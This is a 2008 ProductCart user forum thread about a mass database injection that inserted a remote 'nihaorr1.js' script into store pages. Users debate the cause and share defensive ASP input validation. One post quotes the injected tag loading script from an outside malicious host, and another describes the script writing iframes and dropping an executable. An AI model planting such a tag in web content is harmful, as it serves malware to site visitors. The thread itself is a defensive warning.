ProductCart E-Commerce Solutions Homepage
Forum Home Forum Home > ProductCart > Using ProductCart
  New Posts New Posts RSS Feed - Database Breach
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Database Breach

 Post Reply Post Reply Page  123>
Author
Message
kimmyecoist View Drop Down
Newbie
Newbie


Joined: 27-March-2008
Status: Offline
Points: 0
Post Options Post Options   Thanks (0) Thanks(0)   Quote kimmyecoist Quote  Post ReplyReply Direct Link To This Post Topic: Database Breach
    Posted: 18-April-2008 at 11:53am
Our site has been down due to a database breach from an unknown .js code
and site. Nihaorr1.js

Is there any patch or solution for this security breach?

We're running version 3.03.

Is anyone else have affected databases?
Back to Top
Hamish View Drop Down
Admin Group
Admin Group


Joined: 12-October-2006
Location: United Kingdom
Status: Offline
Points: 56
Post Options Post Options   Thanks (0) Thanks(0)   Quote Hamish Quote  Post ReplyReply Direct Link To This Post Posted: 18-April-2008 at 12:00pm
Do you have any info on how the hack was achieved?
If you find/suspect it's an issue with PC then please raise a support request to EA at the earliest opportunity - I know they are keen to keep their product & users safe.

Best of luck with the recovery of your site.
I would recommend upgrading soon after to the latest release.

Back to Top
ProductCart View Drop Down
Admin Group
Admin Group

ProductCart Team

Joined: 01-October-2003
Status: Offline
Points: 135
Post Options Post Options   Thanks (0) Thanks(0)   Quote ProductCart Quote  Post ReplyReply Direct Link To This Post Posted: 18-April-2008 at 12:10pm
Definitely open a support ticket so that we can learn more about this.

We have no reports of any security issues of any kind. As you know, ProductCart-powered stores pass HackerSafe tests, which is a good indication of an application that protects you from know security concerns such as SQL injections.

For more information: HackerSafe (now McAfee Secure)



Edited by earlyimp - 22-October-2008 at 6:33pm
The ProductCart Team

Home of ProductCart shopping cart software
Back to Top
Hamish View Drop Down
Admin Group
Admin Group


Joined: 12-October-2006
Location: United Kingdom
Status: Offline
Points: 56
Post Options Post Options   Thanks (0) Thanks(0)   Quote Hamish Quote  Post ReplyReply Direct Link To This Post Posted: 18-April-2008 at 12:15pm
I Googled it - looks like an SQL injection attack :

<snip>Our initial investigations are pointing at an attack through IIS using ASP in an overload. 

whois lookup showing nihaorr1 registered via Chinese registrar xinnet.com

I used the safety of a VM to look under the hood at the operations of the 1.js file.

It writes several iframes to that seem to come up as page not found (Chinese language pack)
A look at the script is bit confusing and garbled (of course) but consistent reference is made to "cuteqq" as a variable and variable prefix. It creates an executable I have yet to determine its intent or impact.
Googling "cuteqq" pulls up all sorts of harmful flagged pages.  Anyone have any insight on that?

</snip>


Back to Top
kimmyecoist View Drop Down
Newbie
Newbie


Joined: 27-March-2008
Status: Offline
Points: 0
Post Options Post Options   Thanks (0) Thanks(0)   Quote kimmyecoist Quote  Post ReplyReply Direct Link To This Post Posted: 18-April-2008 at 12:19pm
I'm opening a ticket currently.

The effect of the script on our site causes our images to not show up,
certain pages to not work, and unable to log into ProductCart admin.

We are working with the Host currently to restore to a backup of a clean DB.


Back to Top
Greg Dinger View Drop Down
Certified ProductCart Developers
Certified ProductCart Developers
Avatar

Joined: 23-September-2006
Location: United States
Status: Offline
Points: 238
Post Options Post Options   Thanks (0) Thanks(0)   Quote Greg Dinger Quote  Post ReplyReply Direct Link To This Post Posted: 18-April-2008 at 12:21pm

It used to be that "sql injection" was all the rage.  In recent months an attack method called "cross site scripting" has become ever so popular and is deadly.  The level of hack attempts has become intense and strong protective measures are necessary.

ProductCart has strong security measures but many sites have other software, such as FAQ tools, news tools, and the like built into them.  Any of those secondary applications may be vulnerable to security threats. 

As a general warning to the entire PC community:  If you have added other scripts to your site, you would be well-advised to engage the services of a professional programmer to review your site and examine such applications for security threats.  It's worth a couple hours of someone's time to poke around instead of running the risk that some day you have to confront the fact you have been hacked.

Here is an e-mail I received from a fellow-developer yesterday, which he had just received from a client.  Don't be the next site to get hacked.   Protect yourselves!

“This past weekend it would appear our database was compromised somehow and it pasted this script into every item we have and just totally deleted all the item descriptions. I have contacted the site host and they did a database restore and everything was fine. Now today I see that same script has been paste to our “add to cart” button and not allowing customers to purchase item.

Here is the script: <script sr<script src=http://www.nihaorr1.com/1.js></script>”

BTW, I should note that the above customer does NOT use PC.  They use a different cart...



Edited by Greg Dinger - 18-April-2008 at 12:22pm
Back to Top
kimmyecoist View Drop Down
Newbie
Newbie


Joined: 27-March-2008
Status: Offline
Points: 0
Post Options Post Options   Thanks (0) Thanks(0)   Quote kimmyecoist Quote  Post ReplyReply Direct Link To This Post Posted: 18-April-2008 at 12:38pm
Greg, that is what has happened to us.

Can you please advise on what to do? Our programmers are looking for us
to see what patches ProductCart offers in order to update our code.
Back to Top
katharina View Drop Down
Senior Member
Senior Member
Avatar

Joined: 25-October-2005
Location: United States
Status: Offline
Points: 0
Post Options Post Options   Thanks (0) Thanks(0)   Quote katharina Quote  Post ReplyReply Direct Link To This Post Posted: 18-April-2008 at 12:38pm
Thank you all for the alert.  It does have a function when something like this gets posted into the forum.  I agree that a trouble ticket has to be raised, yet at the same time it is good to have some sort of warning.  This may not effect all of us and it may be only a one incident and perhaps was caused by some other application running in conjunction with PC.  I want to be safe until we really know what has been going on.

I've taken the following actions as a precaution:
1. I did back up the store database.
2. I did purge all credit cards.
I will do both actions daily until we have this possible thread resolved.

Again thanks for the heads up,
Katharina
Back to Top
Greg Dinger View Drop Down
Certified ProductCart Developers
Certified ProductCart Developers
Avatar

Joined: 23-September-2006
Location: United States
Status: Offline
Points: 238
Post Options Post Options   Thanks (0) Thanks(0)   Quote Greg Dinger Quote  Post ReplyReply Direct Link To This Post Posted: 18-April-2008 at 12:50pm
Kimmy - Now that your site is back up, I do see that you have a dealer locator page on your site, and that it uses a database.  That may very well be the page that was vulnerable to cross site scripting, which based on your reference to "Nihaorr1.js" which matches the customer report I posted, so I do believe that you got nailed by an XSS attack.
Back to Top
Greg Dinger View Drop Down
Certified ProductCart Developers
Certified ProductCart Developers
Avatar

Joined: 23-September-2006
Location: United States
Status: Offline
Points: 238
Post Options Post Options   Thanks (0) Thanks(0)   Quote Greg Dinger Quote  Post ReplyReply Direct Link To This Post Posted: 18-April-2008 at 1:01pm

Kimmy - your question arrived while I was posting the other response. 

What has to happen is that you have to examine the values that are being passed from page to page.  Someone may have different ideas about how to address this, but here is an example of what I implement for pages that pass a numeric id for a category.  Essentially, if the required category is not provided, I set a fail code.  If the passed value is not a number, I set a fail code.  And when the fail code is set, then I gracefully display a "invalid entry" message and kill the page.  The threat ends there.  (If others have alternative approaches, PLEASE let us know.)

<%
catid = getUserInput(Request.QueryString("catid"),0)
badcat = "0"
if trim(catid) = "" then badcat = "1"
if IsNumeric(trim(catid)) = "False" then badcat = "1"
if badcat = "1" then

%>
<div class="bodytext">
<br /><br /><br />Sorry - insufficient data to process request<br /><br /><br />
</div>
<!--#include virtual="/gallery/includes/footer.asp"-->
<!--#include virtual="/includes/footer.asp"-->
</body>
</html>
<%
response.end
end if
%>

Now in your case, you are passing 2-digit alpha state codes.  If that is the only legitimate value, then you can use ASP string commands to trim that value to a 2-digit length.  By doing that, if the hacker placed additional characters into the querystring, they are chopped off and rendered harmless.

I have another mechanism that I use.  It is a script that is installed in the site, replaces the IIS 500-100 error, and sends the site owner or host (me) an e-mail when a page in the site crashes.  It tends to not be effective for the PC section of the site because EI has their own error handling.  But for other pages, I have found this an essential tool in my defensive measures.  I know every time a script chokes and can frequently tell that the reason for the page crashing was a hack attempt.

Again, if anyone has alternatives they consider stronger or more effective, please speak up.  The barrage of hack attempts these days seems endless and I take these threats very seriously.

Back to Top
 Post Reply Post Reply Page  123>
  Share Topic   

Forum Jump Forum Permissions View Drop Down

Forum Software by Web Wiz Forums® version 12.04
Copyright ©2001-2021 Web Wiz Ltd.

This page was generated in 0.063 seconds.